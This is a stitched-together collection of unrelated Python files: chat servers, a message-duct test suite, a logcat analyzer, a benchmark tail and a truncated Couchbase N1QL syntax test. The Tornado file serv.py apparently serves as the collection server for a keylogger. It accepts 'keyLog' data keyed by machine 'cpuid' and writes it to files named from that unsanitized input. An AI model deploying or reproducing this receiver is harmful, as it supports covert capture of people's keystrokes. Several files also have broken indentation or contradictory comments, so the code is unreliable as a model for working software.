                    # High-order signature with no generated code: record as
                    # incompatible instead of crashing on f.write(None).
                    successful = False
                else:
                    # Use signature as filename prefix to make it easier to find
                    prefix = re.sub('[^0-9a-zA-Z]+', '_', signature.strip())
                    successful = build_signature(prefix, cpp_code, debug)

                # Acquire a lock to do I/O
                with output_lock:
                    if successful:
                        result_string = "Success"
                        compatible_signatures.add(signature)
                    else:
                        result_string = "Fail"
                        incompatible_signatures.add(signature)
                    print("Results of test {0} / {1}, {2} ... ".format(n, work_queue_original_length, signature.strip()) + result_string)
            finally:
                # Always mark the item done, otherwise a worker error would
                # leave work_queue.join() blocked forever.
                work_queue.task_done()

    for i in range(cores):
        threading.Thread(target=worker).start()

    work_queue.join()

    with open(results_file, "w") as f:
        json.dump({"compatible_signatures": list(compatible_signatures),
                   "incompatible_signatures": list(incompatible_signatures),
                   "irrelevant_signatures": list(irrelevant_signatures)
                   }, f, indent=4, sort_keys=True)
class FullErrorMsgParser(ArgumentParser):
    """ArgumentParser variant that prints the full help text on any error."""

    def error(self, message):
        # Report the problem, show the complete help, and exit with the
        # conventional argparse error status (2).
        sys.stderr.write("error: {0}\n".format(message))
        self.print_help()
        sys.exit(2)
def processCLIArgs():
    """
    Define and process the command line interface to the benchmark.py script.
    """
    cli = FullErrorMsgParser(
        description="Generate and run_command benchmarks.",
        formatter_class=ArgumentDefaultsHelpFormatter,
    )
    cli.add_argument(
        "--functions",
        nargs="+",
        type=str,
        default=[],
        help="Signatures and/or function names to benchmark.",
    )
    cli.add_argument(
        "-j",
        type=int,
        default=1,
        help="Number of parallel cores to use.",
    )
    cli.add_argument(
        "--debug",
        action="store_true",
        help="Keep cpp, stdout, and stderr for incompatible functions.",
    )
    cli.add_argument(
        "results_file",
        type=str,
        default=None,
        help="File to save results in.",
    )
    parsed = cli.parse_args()

    main(
        functions_or_sigs=parsed.functions,
        results_file=parsed.results_file,
        cores=parsed.j,
        debug=parsed.debug,
    )


if __name__ == "__main__":
    processCLIArgs()
|
server.py | #!/usr/bin/env python3
import threading
import socket
import argparse
import os
class Server(threading.Thread):
    """
    Supports management of server connections.

    Attributes:
        connections (list): A list of ServerSocket objects representing the active connections.
        host (str): The IP address of the listening socket.
        port (int): The port number of the listening socket.
    """
    def __init__(self, host, port):
        super().__init__()
        self.connections = []
        self.host = host
        self.port = port

    def run(self):
        """
        Accept loop: bind a reusable listening socket and spin up one
        ServerSocket thread per incoming client. Every handler thread is
        recorded in the connections attribute.
        """
        listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # SO_REUSEADDR allows rebinding a recently used address.
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((self.host, self.port))
        # Small-scale app: one waiting connection at a time is enough.
        listener.listen(1)
        print('Listening at', listener.getsockname())

        while True:
            client_sock, client_addr = listener.accept()
            print('Accepted a new connection from {} to {}'.format(
                client_sock.getpeername(), client_sock.getsockname()))

            handler = ServerSocket(client_sock, client_addr, self)
            handler.start()
            self.connections.append(handler)
            print('Ready to receive messages from', client_sock.getpeername())

    def broadcast(self, message, source):
        """
        Sends a message to all connected clients, except the source of the message.

        Args:
            message (str): The message to broadcast.
            source (tuple): The socket address of the source client.
        """
        for conn in self.connections:
            if conn.sockname != source:
                conn.send(message)

    def remove_connection(self, connection):
        """
        Removes a ServerSocket thread from the connections attribute.

        Args:
            connection (ServerSocket): The ServerSocket thread to remove.
        """
        self.connections.remove(connection)
class ServerSocket(threading.Thread):
    """
    Supports communications with a connected client.

    Attributes:
        sc (socket.socket): The connected socket.
        sockname (tuple): The client socket address.
        server (Server): The parent thread.
    """
    def __init__(self, sc, sockname, server):
        super().__init__()
        self.sc = sc
        self.sockname = sockname
        self.server = server

    def run(self):
        """
        Receives data from the connected client and broadcasts the message to all other clients.
        If the client has left the connection, closes the connected socket and removes itself
        from the list of ServerSocket threads in the parent Server thread.
        """
        while True:
            message = self.sc.recv(1024).decode('ascii')
            if message:
                print('{} says {!r}'.format(self.sockname, message))
                self.server.broadcast(message, self.sockname)
            else:
                # Client has closed the socket, exit the thread
                print('{} has closed the connection'.format(self.sockname))
                self.sc.close()
                # Bug fix: was `server.remove_connection(self)`, which relied
                # on a module-level global that only exists when run as a
                # script; use the parent stored on this instance instead.
                self.server.remove_connection(self)
                return

    def send(self, message):
        """
        Sends a message to the connected client.

        Args:
            message (str): The message to be sent.
        """
        self.sc.sendall(message.encode('ascii'))
def exit(server):
    """
    Allows the server administrator to shut down the server.

    Typing 'q' in the command line will close all active connections and exit the application.
    """
    while True:
        command = input('')
        if command != 'q':
            continue
        print('Closing all connections...')
        for conn in server.connections:
            conn.sc.close()
        print('Shutting down the server...')
        # os._exit skips cleanup handlers and kills all threads immediately.
        os._exit(0)
if __name__ == '__main__':
    # Command-line interface: positional listen address plus optional port.
    parser = argparse.ArgumentParser(description='Chatroom Server')
    parser.add_argument('host', help='Interface the server listens at')
    parser.add_argument('-p', metavar='PORT', type=int, default=1060,
                        help='TCP port (default 1060)')
    args = parser.parse_args()

    # Create and start server thread
    # NOTE(review): ServerSocket.run references the module-global `server`
    # on disconnect, so this name must stay `server`.
    server = Server(args.host, args.p)
    server.start()

    # Admin console thread; the local name shadows both the builtin `exit`
    # and the `exit` function passed as target.
    exit = threading.Thread(target = exit, args = (server,))
exit.start() |
test_message_duct.py | from __future__ import print_function
from unittest import TestCase
from assertpy import assert_that
import threading
import os
import time
import subprocess
import sys
import multiprocessing
import errno
from ductworks.message_duct import MessageDuctParent, MessageDuctChild, create_psuedo_anonymous_duct_pair
from integration_tests import SUBPROCESS_TEST_SCRIPT, ROOT_DIR
class MessageDuctIntegrationTest(TestCase):
    """Integration tests for ductworks message ducts (UDS, TCP, subprocess,
    multiprocessing and performance scenarios)."""

    def test_basic_message_passing(self):
        """
        As a Python developer,
        I want to be able to easily create a message duct pair and send structured data,
        and receive (and reassemble it correctly) so that I don't have to do lots of work and things "just work".
        """
        test_data = ["hello world", 42]
        parent, child = create_psuedo_anonymous_duct_pair()
        bind_address = parent.bind_address
        parent.send(test_data)
        assert_that(child.recv()).is_equal_to(test_data)
        child.close()
        parent.close()
        # Closing the pair must clean up the UDS file.
        assert_that(os.path.exists(bind_address)).is_false()

    def test_tcp_message_passing(self):
        """
        As a Python developer,
        I want to also be able to send messages over TCP instead of Unix Domain sockets,
        so that I can make things work even when systems are remote or lack UDS facilities.
        """
        test_data = ["bob", "saget"]
        parent = MessageDuctParent.psuedo_anonymous_tcp_parent_duct()
        parent.bind()
        child = MessageDuctChild.psuedo_anonymous_tcp_child_duct(parent.listener_address[0], parent.listener_address[1])
        child.connect()
        assert_that(parent.listen()).is_true()
        parent.send(test_data)
        assert_that(child.recv()).is_equal_to(test_data)
        child.close()
        parent.close()

    def test_big_message(self):
        """
        As a Python developer,
        I want to be able to send and receive large messages and data structures faithfully,
        so that I don't have to worry about data get corrupted or lost when I send more data.
        """
        big_string = "lol" * 1024 * 128
        big_list = [big_string, 1, big_string, 2, big_string, 3]
        parent, child = create_psuedo_anonymous_duct_pair()
        bind_address = parent.bind_address

        # Send from a thread so a large payload cannot deadlock the test.
        def child_target():
            child.send(big_list)

        t = threading.Thread(target=child_target)
        t.start()
        assert_that(parent.recv()).is_equal_to(big_list)
        child.close()
        parent.close()
        assert_that(os.path.exists(bind_address)).is_false()

    def test_multiple_writers(self):
        """
        As a Python developer,
        I want to be able to specify a lock, and for multiple writers to be able to send data without race conditions,
        so that I can scale out nicely with concurrency without working too hard.
        """
        big_string = "lol" * 1024 * 128
        big_list = [big_string, 1, big_string, 2, big_string, 3]
        parent, child = create_psuedo_anonymous_duct_pair(child_lock=threading.Lock())
        bind_address = parent.bind_address

        def child_target():
            for _ in range(25):
                child.send(big_list)

        threads = []
        for _ in range(4):
            t = threading.Thread(target=child_target)
            # Bug fix: was `t = t.start()`, which rebinds t to None and
            # filled `threads` with Nones instead of Thread objects.
            t.start()
            threads.append(t)

        while parent.poll(10) is True:
            assert_that(parent.recv()).is_equal_to(big_list)

        child.close()
        parent.close()
        assert_that(os.path.exists(bind_address)).is_false()

    def test_ducts_with_subprocess(self):
        """
        As a Python developer,
        I want to be able to start a new Python interpreter (or anything else that supports the message duct protocol)
        in a child (or any other process) and be able to communicate with minimal overhead, so that I can
        support my often various concurrency and communication needs.
        """
        assert_that(SUBPROCESS_TEST_SCRIPT).exists()
        proc = None
        parent = None
        try:
            parent = MessageDuctParent.psuedo_anonymous_parent_duct()
            parent.bind()
            proc = subprocess.Popen(
                [sys.executable, SUBPROCESS_TEST_SCRIPT, parent.listener_address], env={'PYTHONPATH': ROOT_DIR}
            )
            assert_that(parent.listen()).is_true()
            for _ in range(100):
                parent.send("pingpong")
                parent.poll(1)
                assert_that(parent.recv()).is_equal_to("pingpong")
            # None tells the child script to shut down.
            parent.send(None)
            time.sleep(1)
        finally:
            if parent:
                parent.close()
            if proc:
                proc.terminate()

    def test_mp_pipe_replacement(self):
        """
        As a Python developer,
        I want to be able to use ductworks with multiprocessing,
        and to be able to close the child duct after forking,
        so that I can drop ductworks in place of multiprocessing.Pipe
        without causing unexpected problems.
        """
        parent, child = create_psuedo_anonymous_duct_pair()

        def mp_child_target():
            # The forked process uses only the child end.
            parent.close()
            time.sleep(3)
            child.send("hello world")
            child.close()

        p = multiprocessing.Process(target=mp_child_target)
        p.daemon = True
        p.start()
        # Parent process keeps only the parent end.
        child.close()
        p.join(10)
        assert_that(parent.recv()).is_equal_to("hello world")
        parent.close()

    def test_eof_on_remote_close(self):
        """
        As a Python developer,
        I want to be able my duct to raise EOFError when there's
        nothing left to read, so that it is drop-in compatible with Pipe.
        """
        parent, child = create_psuedo_anonymous_duct_pair()
        child.close()
        self.assertRaises(EOFError, parent.recv)
        try:
            parent.send("test")
        except IOError as e:
            assert getattr(e, 'errno') == errno.EPIPE
        except Exception:
            # Narrowed from a bare `except:` so SystemExit/KeyboardInterrupt
            # are not swallowed here.
            raise AssertionError("Incorrect exception raised for parent.send() on a broken connection!")
        parent.close()

    def test_performance(self):
        """
        As a Python developer,
        I want my message duct to have reasonably good performance,
        so that the duct does not become a major bottleneck in my application.
        """
        big_string = u"\u0FF0lol" * 1024 * 128
        parent = MessageDuctParent.psuedo_anonymous_parent_duct()
        parent.bind()
        bind_address = parent.bind_address
        child = MessageDuctChild.psuedo_anonymous_child_duct(bind_address)
        child.connect()
        assert_that(parent.listen()).is_true()
        time.sleep(1)

        def child_target_duct():
            for _ in range(250):
                child.send(big_string)

        t = threading.Thread(target=child_target_duct)
        t.start()
        start_time = time.time()
        total_data = 0
        while parent.poll(0.01) is True:
            recv_data = parent.recv()
            assert_that(recv_data).is_equal_to(big_string)
            total_data += len(recv_data)
        ductwork_approx_perf = total_data/((time.time() - start_time)*1024)
        child.close()
        parent.close()
        assert_that(os.path.exists(bind_address)).is_false()
        print("Ductwork approx perf: {} KB/s".format(ductwork_approx_perf))
        t.join()
|
LogCatAnalyzerThread.py | """
Copyright (C) 2018 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions
and limitations under the License.
SPDX-License-Identifier: Apache-2.0
"""
try:
    # Python 2 module name; renamed to `queue` in Python 3.
    from Queue import Queue, Empty
except ImportError:
    from queue import Queue, Empty
import re
import threading
import time
class LogCatAnalyzerThread():
    """ Logger analyzer that will check input messages to check if
        they validate some criteria.

        Trigger messages are either plain substrings or "regex:<pattern>"
        entries; every log line pushed to the analyzer is matched against
        all registered triggers on a background thread.
    """

    def __init__(self, logger):
        # Analyzer thread stop condition
        self._stop_event = threading.Event()
        # Messages to trigger: trigger string -> list of matching log lines
        self.__messages_to_trigger = {}
        # Lock protecting the trigger dict (reentrant: callers may nest)
        self.__lock_message_triggered = threading.RLock()
        # Internal buffer of log lines awaiting analysis
        self.__queue = Queue()
        # Working thread
        self.__analyzer_thread = None
        # Logger to be used to output messages
        self._logger = logger
        # Delay to wait before processing new item in the queue
        self.analyzer_loop_delay = 0.1

    def stop(self):
        """Signal the worker thread to stop and wait (max 5s) for it."""
        self._stop_event.set()
        if self.__analyzer_thread is not None:
            try:
                self.__analyzer_thread.join(5)
            except (KeyboardInterrupt, SystemExit):
                raise
            except BaseException:
                # Best effort: a join failure must not mask caller errors.
                pass
            finally:
                del self.__analyzer_thread
                self.__analyzer_thread = None

    def start(self):
        """Start the background analyzer thread."""
        self._stop_event.clear()
        self.__analyzer_thread = threading.Thread(target=self.__run)
        self.__analyzer_thread.name = "LogCatAnalyzerThread"
        self.__analyzer_thread.daemon = True
        self.__analyzer_thread.start()

    def push(self, line):
        """Queue one log line for asynchronous analysis."""
        self.__queue.put_nowait(line)

    def __run(self):
        # Worker loop: drain the queue, then sleep analyzer_loop_delay.
        while not self._stop_event.is_set():
            while not self.__queue.empty():
                try:
                    line = self.__queue.get_nowait()
                    self.__analyze_line(line)
                except Empty:
                    pass
            self._stop_event.wait(self.analyzer_loop_delay)

    def __analyze_line(self, line):
        # Match one line against every registered trigger.
        if line:
            line = line.rstrip('\r\n')
            with self.__lock_message_triggered:
                for trig_message in self.__messages_to_trigger:
                    if trig_message.startswith("regex:"):
                        reg_ex = trig_message.split("regex:")[1]
                        try:
                            if re.search(reg_ex, line) is not None:
                                # Message received, store log line
                                self.__messages_to_trigger[trig_message].append(line)
                        except re.error as ex:
                            if self._logger is not None:
                                self._logger.error("Cannot compute regular expression \"%s\": %s" % (reg_ex, ex))
                    elif line.find(trig_message) != -1:
                        # Message received, store log line
                        self.__messages_to_trigger[trig_message].append(line)

    def add_trigger_messages(self, messages):
        """Register several trigger messages at once."""
        for message in messages:
            self.add_trigger_message(message)

    def add_trigger_message(self, message):
        """ Trigger a message

        :type message: string
        :param message: message to be triggered
        """
        with self.__lock_message_triggered:
            self.__messages_to_trigger[message] = list()

    def remove_trigger_message(self, message):
        """ Remove a triggered message

        :type message: string
        :param message: message to be removed
        """
        if message in self.__messages_to_trigger:
            with self.__lock_message_triggered:
                del self.__messages_to_trigger[message]

    def is_message_received(self, message, timeout):
        """ Check if a message is received

        :type message: string
        :param message: message that we look for
        :type timeout: int
        :param timeout: time limit where we expect to receive the message

        :return: Array of message received, empty array if nothing
        :rtype: list
        """
        remove_trigger_message = False
        if message not in self.__messages_to_trigger:
            self.add_trigger_message(message)
            remove_trigger_message = True

        messages_received = None
        begin_time = time.time()
        end_time = begin_time + float(timeout)

        while (not messages_received) and (time.time() < end_time):
            messages_received = self.get_message_triggered_status(message)
            time.sleep(0.2)

        if messages_received:
            # Clone the list to return as remove trigger message
            # is going to delete it
            messages_received = list(messages_received)

        if remove_trigger_message:
            self.remove_trigger_message(message)

        return messages_received

    def get_message_triggered_status(self, message):
        """ Get the status of a message triggered

        :type message: string
        :param message: message triggered

        :return: Array of message received, empty array if nothing
        :rtype: list
        """
        if message in self.__messages_to_trigger:
            return self.__messages_to_trigger[message]
        else:
            return None

    def reset_trigger_message(self, message):
        """ Reset triggered message

        :type message: string
        :param message: message to be reseted
        """
        if message in self.__messages_to_trigger:
            with self.__lock_message_triggered:
                # Bug fix: the original acquired and released the lock but
                # never actually cleared the recorded lines.
                self.__messages_to_trigger[message] = list()
|
server.py | import socket
import threading
import json
class Server:
    """
    Chat room server: accepts client logins and relays broadcast messages.
    """

    def __init__(self):
        """Create the listening socket and the (parallel) user tables."""
        self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        # __connections[i] / __nicknames[i] belong to user id i; slot 0 is
        # the system pseudo-user, dead slots are reset to None.
        self.__connections = list()
        self.__nicknames = list()

    def __user_thread(self, user_id):
        """
        Per-user worker thread: receives packets and relays broadcasts.

        :param user_id: index of the user in the connection table
        """
        connection = self.__connections[user_id]
        nickname = self.__nicknames[user_id]
        print('[Server] 用户', user_id, nickname, '加入聊天室')
        self.__broadcast(message='用户 ' + str(nickname) + '(' + str(user_id) + ')' + '加入聊天室')
        # Receive loop
        while True:
            # noinspection PyBroadException
            try:
                buffer = connection.recv(1024).decode()
                # Parse the packet as JSON
                obj = json.loads(buffer)
                # Relay broadcast packets to everyone else
                if obj['type'] == 'broadcast':
                    self.__broadcast(obj['sender_id'], obj['message'])
                else:
                    print('[Server] 无法解析json数据包:', connection.getsockname(), connection.fileno())
            except Exception:
                print('[Server] 连接失效:', connection.getsockname(), connection.fileno())
                self.__connections[user_id].close()
                self.__connections[user_id] = None
                self.__nicknames[user_id] = None
                # Bug fix: leave the loop once the connection is dead; the
                # original kept looping on the closed socket forever.
                break

    def __broadcast(self, user_id=0, message=''):
        """
        Broadcast *message* to every user except the sender.

        :param user_id: sender id (0 is the system)
        :param message: text to broadcast
        """
        for i in range(1, len(self.__connections)):
            # Bug fix: skip slots of users that already disconnected
            # (their entries are reset to None on failure).
            if user_id != i and self.__connections[i] is not None:
                self.__connections[i].send(json.dumps({
                    'sender_id': user_id,
                    'sender_nickname': self.__nicknames[user_id],
                    'message': message
                }).encode())

    def start(self):
        """
        Start the server: bind, listen and accept logins forever.
        """
        # Bind the port
        self.__socket.bind(('127.0.0.1', 8888))
        # Start listening
        self.__socket.listen(10)
        print('[Server] 服务器正在运行......')
        # Reset the tables; slot 0 is reserved for the system pseudo-user.
        self.__connections.clear()
        self.__nicknames.clear()
        self.__connections.append(None)
        self.__nicknames.append('System')
        # Accept loop
        while True:
            connection, address = self.__socket.accept()
            print('[Server] 收到一个新连接', connection.getsockname(), connection.fileno())
            # noinspection PyBroadException
            try:
                buffer = connection.recv(1024).decode()
                obj = json.loads(buffer)
                # A login packet gets a fresh user id and its own thread
                if obj['type'] == 'login':
                    self.__connections.append(connection)
                    self.__nicknames.append(obj['nickname'])
                    connection.send(json.dumps({
                        'id': len(self.__connections) - 1
                    }).encode())
                    thread = threading.Thread(target=self.__user_thread, args=(len(self.__connections) - 1, ))
                    thread.daemon = True  # setDaemon() is deprecated
                    thread.start()
                else:
                    print('[Server] 无法解析json数据包:', connection.getsockname(), connection.fileno())
            except Exception:
                print('[Server] 无法接受数据:', connection.getsockname(), connection.fileno())
|
serv.py | import os
import tornado.ioloop
import tornado.web
import tornado.escape
import tornado.httpserver
import threading
import queue
import time
class LogWriter():
    """Background log writer: consumes (file_key, line) pairs from a queue
    and appends each line to "<file_key>.txt", caching open file handles.
    A companion cleaner thread periodically closes the handles so buffered
    data is flushed to disk.
    """

    def __init__(self):
        self.queue = queue.Queue()
        # Parallel lists: opened_files[i] is the key of opened_files_handles[i].
        self.opened_files = []
        self.opened_files_handles = []
        # writer and cleaner must not touch the handle cache concurrently
        self.mutex = threading.Lock()

    def _write_one(self, dic):
        """Append one (file_key, line) record, opening and caching the file
        handle on first use. Acquires the mutex itself."""
        with self.mutex:
            try:
                idx = self.opened_files.index(dic[0])
                f = self.opened_files_handles[idx]
            except ValueError:
                # First line for this key: open (and cache) its log file.
                # NOTE(review): dic[0] comes straight from a request
                # parameter upstream; consider sanitizing it before using
                # it as a file name.
                f = open(dic[0] + '.txt', 'a')
                self.opened_files.append(dic[0])
                self.opened_files_handles.append(f)
            f.write(dic[1] + '\n')

    def run(self):
        """Consume the queue forever.

        Bug fix: the original closed opened_files_handles[0] and cleared the
        whole cache in a ``finally`` after *every* message, which closed the
        wrong handle, leaked the just-opened one and defeated the cache.
        Periodic flushing belongs to cleaner().
        """
        while True:
            self._write_one(self.queue.get(block=True))

    def cleaner(self):
        """Every 20 s close all cached handles so their buffers are flushed;
        the writer reopens files lazily on the next message."""
        while True:
            time.sleep(20)
            with self.mutex:
                for f in self.opened_files_handles:
                    f.close()
                self.opened_files_handles.clear()
                self.opened_files.clear()
class AnnounceHandler(tornado.web.RequestHandler):
    """Handles POST /announce: acknowledges the request and queues any
    non-empty keyLog payload for the background log writer."""

    async def post(self):
        key_log = self.get_argument("keyLog")
        print(key_log)
        self.write('ACK')
        if key_log != '':
            log_writer.queue.put((self.get_argument("cpuid"), key_log))
def make_app():
    """Build the Tornado application with a single /announce route."""
    settings = dict(
        static_path=os.path.join(os.path.dirname(__file__), "static"),
        template_path=os.path.join(os.path.dirname(__file__), "templates"),
        cookie_secret="`10uu00as8j[].;.[;[,p8",
        xsrf_cookies=False,
        debug=True,
        compiled_template_cache=False,
    )
    routes = [
        (r"/announce", AnnounceHandler),
    ]
    return tornado.web.Application(
        [(tornado.web.HostMatches(r'.*'), routes)],
        **settings)
if __name__ == "__main__":
    # Start the log writer and its periodic flusher as daemon threads.
    log_writer = LogWriter()
    t1 = threading.Thread(target=log_writer.run)
    t2 = threading.Thread(target=log_writer.cleaner)
    # setDaemon() is deprecated; assign the attribute instead.
    t1.daemon = True
    t2.daemon = True
    t1.start()
    t2.start()
    # Start the HTTP server
    app = make_app()
    server = tornado.httpserver.HTTPServer(app)
    server.bind(8086)
    server.start(1)  # 0: forks one process per cpu
    tornado.ioloop.IOLoop.current().start()
|
n1ql_window_functions_syntax_check.py | from .tuq import QueryTests
import random
import string
from random import randint
from membase.api.exception import CBQError
import threading
import copy
class WindowFunctionsSyntaxTest(QueryTests):
def setUp(self):
    """Per-test setup: delegate to QueryTests, then define the index
    metadata and query bucket used by the window-function queries."""
    super(WindowFunctionsSyntaxTest, self).setUp()
    self.log_config_info()
    self.log.info("============== WindowFunctionsSyntaxTest setup has started ==============")
    # Index definitions referenced by the generated USE INDEX clauses.
    self.primary_idx = {'name': '#primary', 'bucket': 'test_bucket', 'fields': (), 'state': 'online',
                        'using': self.index_type.lower(), 'is_primary': True}
    self.idx_1 = {'name': 'ix_char', 'bucket': 'test_bucket', 'fields': [('char_field', 0)], 'state': 'online',
                  'using': self.index_type.lower(), 'is_primary': False}
    self.idx_2 = {'name': 'ix_decimal', 'bucket': 'test_bucket', 'fields': [('decimal_field', 0)],
                  'state': 'online', 'using': self.index_type.lower(), 'is_primary': False}
    self.idx_3 = {'name': 'ix_int', 'bucket': 'test_bucket', 'fields': [('int_field', 0)], 'state': 'online',
                  'using': self.index_type.lower(), 'is_primary': False}
    self.indexes = [self.primary_idx, self.idx_1, self.idx_2, self.idx_3]
    # This suite always runs against the dedicated 'test_bucket'.
    if self.test_buckets != 'test_bucket':
        self.test_buckets = 'test_bucket'
    self.query_bucket = self.get_query_buckets(deferred_bucket=self.test_buckets)[-1]
    self.log.info("============== WindowFunctionsTest setup has completed ==============")
def tearDown(self):
    """Per-test teardown: log markers around the base-class teardown."""
    self.log_config_info()
    self.log.info("============== WindowFunctionsSyntaxTest tearDown has started ==============")
    super(WindowFunctionsSyntaxTest, self).tearDown()
    self.log.info("============== WindowFunctionsSyntaxTest tearDown has completed ==============")
def suite_setUp(self):
    """One-time suite setup: prepare nodes, data and indexes in
    'test_bucket' before any test in this suite runs."""
    super(WindowFunctionsSyntaxTest, self).suite_setUp()
    if self.test_buckets != 'test_bucket':
        self.test_buckets = 'test_bucket'
    self.query_bucket = self.get_query_buckets(deferred_bucket=self.test_buckets)[-1]
    self.init_nodes()
    self.load_test_data(self.query_bucket)
    self.create_primary_index(self.query_bucket)
    self.create_secondary_indexes(self.query_bucket)
    self.adopt_test_data(self.query_bucket)
    self.log_config_info()
    # NOTE(review): these "started/completed" markers are logged after all
    # of the setup work above has already run.
    self.log.info("============== WindowFunctionsSyntaxTest suite_setup has started ==============")
    self.log.info("============== WindowFunctionsSyntaxTest suite_setup has completed ==============")
def suite_tearDown(self):
    """One-time suite teardown: log markers around base-class teardown."""
    self.log_config_info()
    self.log.info("============== WindowFunctionsSyntaxTest suite_tearDown has started ==============")
    super(WindowFunctionsSyntaxTest, self).suite_tearDown()
    self.log.info("============== WindowFunctionsSyntaxTest suite_tearDown has completed ==============")
def run_all(self):
    """Convenience entry point: run both batched query-syntax checks."""
    self.test_from_select_batches()
    self.test_select_from_batches()
def generate_from_select_queries(self):
    """Produce the cartesian product of FROM-SELECT query variants that
    exercise a LAST_VALUE window function with every combination of
    join/unnest, USE KEYS/INDEX, WHERE/LET, GROUP BY/HAVING, ORDER BY,
    LIMIT/OFFSET, namespace and UNION clause.

    :return: list of N1QL query strings
    """
    result = []
    # NOTE(review): `counter` is incremented but never used.
    counter = 0
    window_function_values = [' LAST_VALUE(t1.decimal_field) OVER (PARTITION BY t1.char_field ORDER BY '
                              't1.decimal_field RANGE BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) ']
    alias_values = [' wf ']
    bucket_alias_values = [' ', ' as ']
    let_where_values = [' ', ' where t1.int_field > 1000 ', ' let int_val=1000 where t1.int_field > int_val ']
    group_by_values = [' ', ' group by t1.char_field, t1.decimal_field ']
    letting_having_values = [' ', ' having t1.char_field="E" ',
                             ' letting char_val="E" having t1.char_field=char_val ']
    order_by_values = [' ', ' order by t1.char_field ']
    asc_desc_values = [' ', ' asc ', ' desc ']
    limit_values = [' ', ' limit 100 ']
    offset_values = [' ', ' offset 10 ']
    join_values = [' ', ' inner join ', ' left join ', ' left outer join ', ' inner nest ', ' left nest ']
    union_values = [' ', ' union ', ' union all ']
    namespace_values = ['', 'default:']
    use_keys_values = [' ', ' use primary keys[\'test\'] ', ' use keys[\'test\'] ', ' use index(`ix_char`) ',
                       ' use index(`ix_char`, `ix_decimal`) ', ' use index(`ix_char` using gsi) ']
    join_predicate_values = [' on t1.primary_key=t2.primary_key ', ' on primary keys[\'test\']',
                             ' on keys t1.char_field ', ' on key t2.char_field for t1 ',
                             ' on primary key t2.primary_key for t1 ']
    unnest_flatten_values = [' unnest ', ' left unnest ', ' flatten ', ' left flatten ']
    for window_function_value in window_function_values:
        for alias_value in alias_values:
            for let_where_value in let_where_values:
                for group_by_value in group_by_values:
                    for letting_having_value in letting_having_values:
                        # HAVING/LETTING only make sense with a GROUP BY;
                        # deliberately overrides the loop variable.
                        if group_by_value == ' ':
                            letting_having_value = ' '
                        for order_by_value in order_by_values:
                            for asc_desc_value in asc_desc_values:
                                # ASC/DESC only make sense with ORDER BY.
                                if order_by_value == ' ':
                                    asc_desc_value = ' '
                                for limit_value in limit_values:
                                    for offset_value in offset_values:
                                        for bucket_alias_value in bucket_alias_values:
                                            for namespace_value in namespace_values:
                                                for use_keys_value in use_keys_values:
                                                    for unnest_flatten_value in unnest_flatten_values:
                                                        for join_value in join_values:
                                                            for join_predicate_value in join_predicate_values:
                                                                # Either a JOIN/NEST against a second bucket alias t2,
                                                                # or an UNNEST/FLATTEN of t1.char_field.
                                                                join_expression = ' '
                                                                if join_value != ' ':
                                                                    join_expression = join_value + ' ' + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + ' t2 ' + use_keys_value + join_predicate_value
                                                                else:
                                                                    join_expression = unnest_flatten_value + ' t1.char_field '
                                                                for union_value in union_values:
                                                                    union_left_parenthesis = ''
                                                                    union_right_parenthesis = ''
                                                                    right_union_expression = ''
                                                                    # UNION branches need parenthesized subselects;
                                                                    # the right-hand side mirrors the left one.
                                                                    if union_value != ' ':
                                                                        union_left_parenthesis = '('
                                                                        union_right_parenthesis = ')'
                                                                        right_union_expression = union_left_parenthesis + "select t1.char_field, t1.decimal_field, " + window_function_value + alias_value + " " \
                                                                            "from " + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + " t1 " + use_keys_value + join_expression + let_where_value + group_by_value + letting_having_value + \
                                                                            order_by_value + asc_desc_value + limit_value + offset_value + union_right_parenthesis
                                                                    query = "from (" + union_left_parenthesis + "select t1.char_field, t1.decimal_field, " + window_function_value + alias_value + " " \
                                                                        "from " + namespace_value + ' {0} '.format(self.query_bucket) + bucket_alias_value + " t1 " + use_keys_value + join_expression + let_where_value + group_by_value + letting_having_value + \
                                                                        order_by_value + asc_desc_value + limit_value + offset_value + union_right_parenthesis + union_value + right_union_expression + ") a select a.wf"
                                                                    result.append(query)
                                                                    counter += 1
    return result
    def generate_select_from_queries(self):
        """Generate every supported permutation of a windowed SELECT query.

        Combines the LAST_VALUE window function with all join, unnest/flatten,
        let/where, group-by/letting-having, order-by, limit/offset, namespace,
        USE KEYS/INDEX and union clause variants against self.query_bucket.

        Returns:
            list[str]: the generated N1QL query strings.
        """
        result = []
        counter = 0  # running count of generated queries (kept for debugging)
        window_function_values = [
            ' LAST_VALUE(t1.decimal_field) OVER (PARTITION BY t1.char_field ORDER BY t1.decimal_field RANGE BETWEEN UNBOUNDED PRECEDING AND UNBOUNDED FOLLOWING) ']
        alias_values = [' wf ']
        bucket_alias_values = [' ', ' as ']
        let_where_values = [' ', ' where t1.int_field > 1000 ', ' let int_val=1000 where t1.int_field > int_val ']
        group_by_values = [' ', ' group by t1.char_field, t1.decimal_field ']
        letting_having_values = [' ', ' having t1.char_field="E" ',
                                 ' letting char_val="E" having t1.char_field=char_val ']
        order_by_values = [' ', ' order by t1.char_field ']
        asc_desc_values = [' ', ' asc ', ' desc ']
        limit_values = [' ', ' limit 100 ']
        offset_values = [' ', ' offset 10 ']
        join_values = [' ', ' inner join ', ' left join ', ' left outer join ', ' inner nest ', ' left nest ']
        union_values = [' ', ' union ', ' union all ']
        namespace_values = ['', 'default:']
        use_keys_values = [' ', ' use primary keys[\'test\'] ', ' use keys[\'test\'] ', ' use index(`ix_char`) ',
                           ' use index(`ix_char`, `ix_decimal`) ', ' use index(`ix_char` using gsi) ']
        join_predicate_values = [' on t1.primary_key=t2.primary_key ', ' on primary keys[\'test\']',
                                 ' on keys t1.char_field ', ' on key t2.char_field for t1 ',
                                 ' on primary key t2.primary_key for t1 ']
        unnest_flatten_values = [' unnest ', ' left unnest ', ' flatten ', ' left flatten ']
        for window_function_value in window_function_values:
            for alias_value in alias_values:
                for let_where_value in let_where_values:
